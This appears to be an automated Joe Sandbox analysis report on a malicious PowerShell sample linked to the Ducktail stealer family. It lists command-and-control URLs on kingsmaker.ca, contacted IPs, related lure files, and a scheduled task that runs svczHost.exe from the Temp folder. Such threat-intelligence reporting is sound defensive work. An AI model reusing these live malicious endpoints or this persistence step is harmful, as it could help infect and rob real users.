            https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fafalse
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca6false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc1b0f9d6a14a3503e3efalse
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6635a8c2001ae9b439940f2a4e27446bc2false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/4/4/user/203false
            • Avira URL Cloud: safe
            unknown
            http://kingsmaker.ca/api/checkfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://html4/loose.dtdpowershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpfalse
              high
              https://aka.ms/nativeaot-csvczHost.exefalse
                high
                https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8powershell.exe, 00000005.00000002.2303309267.000001ABDB902000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.microsoft.copowershell.exe, 00000000.00000002.2467580408.000001BDEA400000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2371234415.000001ABF37E5000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000E.00000003.2282329209.0000015D94CE0000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://kingsmaker.capowershell.exe, 00000000.00000002.2397775512.000001BDD3582000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2397775512.000001BDD3A44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2397775512.000001BDD2517000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2397775512.000001BDD391C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303309267.000001ABDC6CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADFBED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1556000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66a2bd10c53ccb7epowershell.exe, 00000000.00000002.2397775512.000001BDD298B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://.csspowershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpfalse
                        high
                        https://github.com/dotnet/runtimepowershell.exe, 0000000B.00000002.3259080917.0000016AEF910000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2780145016.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe.11.drfalse
                          high
                          https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb3powershell.exe, 0000000B.00000002.2814252312.0000016ADFC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1556000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://kingsmaker.capowershell.exe, 00000000.00000002.2397775512.000001BDD3582000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303309267.000001ABDC702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1556000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYpowershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidsvczHost.exe, svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmpfalse
                              high
                              https://aka.ms/dotnet-warnings/powershell.exe, 0000000B.00000002.3259080917.0000016AEF910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000000.2780145016.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe.11.drfalse
                                high
                                https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59epowershell.exe, 00000000.00000002.2397775512.000001BDD2517000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://kingsmaker.ca/file2/2db1653a19d9e7820417a355a5bebd72b81f7e460fa70a5a1edfbf43f5b246051372de1dpowershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://aka.ms/nativeaot-compatibilitysvczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmpfalse
                                  high
                                  https://contoso.com/powershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2461403361.000001BDE2363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3464963086.000001AD901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3464963086.000001AD90072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3495330648.00000212936C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2397775512.000001BDD22F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303309267.000001ABDB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADF871000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmp, powershell.exe, 00000018.00000002.2845746986.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283651000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://.jpgpowershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpfalse
                                          high
                                          https://kingsmaker.ca/4cbd637a18Xpowershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37powershell.exe, 0000000B.00000002.2814252312.0000016ADFA99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADF871000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edpowershell.exe, 00000000.00000002.2397775512.000001BDD28D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://kingsmaker.ca/file2/2db1Xpowershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2461403361.000001BDE2506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2461403361.000001BDE2363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3464963086.000001AD901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3464963086.000001AD90072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3495330648.00000212936C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000001C.00000002.2871665748.0000021284789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3554704406.000002129BA30000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afcpowershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2397775512.000001BDD391C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2303309267.000001ABDB902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADFD96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98acpowershell.exe, 0000000B.00000002.2814252312.0000016ADFC2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://go.micropowershell.exe, 00000005.00000002.2303309267.000001ABDC1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2845746986.000001AD815B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021284B62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://kingsmaker.ca:80/xsvczHost.exe, 00000014.00000002.3596341581.0000019BF3806000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/nativeaot-compatibilityypowershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 0000001C.00000002.2871665748.0000021284FC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000B.00000002.2814252312.0000016AE1830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016AE1856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021284B62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.ver)svchost.exe, 0000000E.00000002.3598133552.0000015D94E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad5Xpowershell.exe, 00000000.00000002.2397775512.000001BDD2E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6635a8c2001ae9b4powershell.exe, 00000000.00000002.2397775512.000001BDD28D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://g.live.com/odclientsettings/Prod/C:svchost.exe, 0000000E.00000003.2282329209.0000015D94D53000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.mpowershell.exe, 00000018.00000002.3543855106.000001ADF61BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://kingsmaker.ca/file2/2db1powershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9bepowershell.exe, 00000000.00000002.2397775512.000001BDD298B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2303309267.000001ABDB902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADFD96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/nativeaot-compatibilityYsvczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                        high
                                                                        https://aka.ms/GlobalizationInvariantModepowershell.exe, 0000000B.00000002.3259080917.0000016AF0120000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmp, svczHost.exe, 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmpfalse
                                                                          high
                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.2397775512.000001BDD22F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303309267.000001ABDB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2814252312.0000016ADF871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2845746986.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2871665748.0000021283651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://kingsmaker.ca/file2/31b8powershell.exe, 00000000.00000002.2397775512.000001BDD2E86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.microsoft.codpowershell.exe, 0000001C.00000002.3557582962.000002129BC21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            52.6.155.20
                                                                            unknownUnited States
                                                                            14618AMAZON-AESUSfalse
                                                                            104.21.75.170
                                                                            kingsmaker.caUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            96.17.64.171
                                                                            unknownUnited States
                                                                            16625AKAMAI-ASUSfalse
                                                                            IP
                                                                            127.0.0.1
                                                                            192.168.2.5
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1565059
                                                                            Start date and time:2024-11-29 08:29:28 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 8m 6s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:30
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:kingsmaker_4.ca.ps1
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.expl.evad.winPS1@47/81@4/5
                                                                            EGA Information:
                                                                            • Successful, ratio: 16.7%
                                                                            HCA Information:Failed
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .ps1
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded IPs from analysis (whitelisted): 2.20.68.210, 192.229.221.95, 2.23.160.135, 162.159.61.3, 172.64.41.3, 2.23.161.164, 34.237.241.83, 18.213.11.84, 54.224.241.105, 50.16.47.176, 23.195.39.65, 23.32.238.152, 23.32.238.130, 23.32.238.161, 2.19.198.48, 23.32.238.145, 23.32.238.115, 2.19.198.50, 2.19.198.40, 23.32.238.129, 23.32.238.105, 23.32.238.99, 23.32.238.137, 23.32.238.107, 23.32.238.146, 23.32.238.131, 23.32.238.144
                                                                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                            • Execution Graph export aborted for target powershell.exe, PID 2924 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 6352 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 7064 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 7368 because it is empty
                                                                            • Execution Graph export aborted for target svczHost.exe, PID 6584 because there are no executed function
                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: kingsmaker_4.ca.ps1
                                                                            TimeTypeDescription
                                                                            02:30:19API Interceptor4154x Sleep call for process: powershell.exe modified
                                                                            02:30:42API Interceptor2x Sleep call for process: svchost.exe modified
                                                                            02:30:52API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                                                            08:31:33Task SchedulerRun new task: zServicecakoi7 path: C:\Windows\Temp\svczHost.exe s>cakoi7 kingsmaker.ca
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            52.6.155.20kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                                              Demande de proposition du Accueil-Parrainage Outaouais.pdfGet hashmaliciousUnknownBrowse
                                                                                cgoaudit Files.pdfGet hashmaliciousUnknownBrowse
                                                                                  method-statement-for-valve-installation_compress.pdfGet hashmaliciousUnknownBrowse
                                                                                    https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                                                      Fw INVOICE TEST-4 - INTUIT QUICKBOOKS - 399.00 USD.zipGet hashmaliciousUnknownBrowse
                                                                                        EXTERN Zahlungsbest#U00e4tigung.msgGet hashmaliciousCVE-2024-21412Browse
                                                                                          Please_Docusign_this_document_July 2024_2471.pdfGet hashmaliciousUnknownBrowse
                                                                                            PO.pdfGet hashmaliciousUnknownBrowse
                                                                                              Absa Eft.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                104.21.75.170Emloyment Form.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                • kingsmaker.ca/api/check
                                                                                                Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                • kingsmaker.ca/api/check
                                                                                                Company Booklet.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                • kingsmaker.ca/api/check
                                                                                                Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                • kingsmaker.ca/api/check
                                                                                                96.17.64.171Integration.pdf www.skype.com.lnkGet hashmaliciousUnknownBrowse
                                                                                                  YShfqKxCAU.lnkGet hashmaliciousDucktailBrowse
                                                                                                    DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDFGet hashmaliciousUnknownBrowse
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      kingsmaker.cakingsmaker.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                      • 172.67.179.67
                                                                                                      kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Emloyment Form.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Emloyment Form.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 172.67.179.67
                                                                                                      Company Booklet.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 172.67.179.67
                                                                                                      Company Booklet.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUSkingsmaker.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                      • 172.67.179.67
                                                                                                      kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                      • 172.67.179.67
                                                                                                      Emloyment Form.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Emloyment Form.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 172.67.179.67
                                                                                                      Company Booklet.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 172.67.179.67
                                                                                                      Company Booklet.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 104.21.16.9
                                                                                                      https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                                                      • 104.16.128.65
                                                                                                      AKAMAI-ASUSJob Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.126.112.182
                                                                                                      Company Booklet.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 23.47.168.24
                                                                                                      Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.126.112.182
                                                                                                      loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 23.52.72.234
                                                                                                      https://www.wixsite.com/_api/invoice/2d5e7023-6014-4f5e-ab31-c1e25d999b96:9b27124a-a130-45dc-b81f-e5675b538826/view?token=56c18155-b636-4505-b95c-630f3d19901aGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 23.56.162.204
                                                                                                      https://www.filemail.com/d/dolcahmytquddazGet hashmaliciousUnknownBrowse
                                                                                                      • 23.203.104.175
                                                                                                      Gale Associates, Inc.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 23.203.104.175
                                                                                                      Scan_19112024_people_power_press.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 23.195.92.153
                                                                                                      sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 172.231.96.79
                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.121.10.34
                                                                                                      AMAZON-AESUSkingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                      • 52.6.155.20
                                                                                                      Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 50.16.47.176
                                                                                                      Company Booklet.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 3.233.129.217
                                                                                                      Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 3.219.243.226
                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 18.208.8.205
                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 18.208.8.205
                                                                                                      https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                                                      • 18.213.79.193
                                                                                                      loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 34.206.144.62
                                                                                                      file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                                                                      • 18.208.8.205
                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 18.208.8.205
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
